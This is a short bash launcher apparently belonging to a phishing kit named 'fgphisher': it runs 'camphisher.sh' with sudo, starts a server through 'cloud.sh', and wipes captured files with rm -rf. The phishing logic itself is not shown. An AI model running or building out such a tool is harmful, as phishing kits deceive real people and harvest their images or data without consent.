#!/usr/bin/env bash

cd /root/fgphisher-tool || { echo "Failed to enter the directory => /root/fgphisher-tool"; exit 1; }

fgphisher(){
  case "$1 $2" in
    "-f --help")
      sudo bash camphisher.sh 
      ;;
    "-s --start")
      server 
      ;;
    "-d files.png")
    rm -rf /root/fgphisher-tool/server.phisher/files
      ;;
    *)
      echo "Erro! Unknown command: $1"
      exit 1
      ;;
  esac
}

server(){
  echo "[::] Starting Fgphisher..."
bash cloud.sh
}


fgphisher "$@"
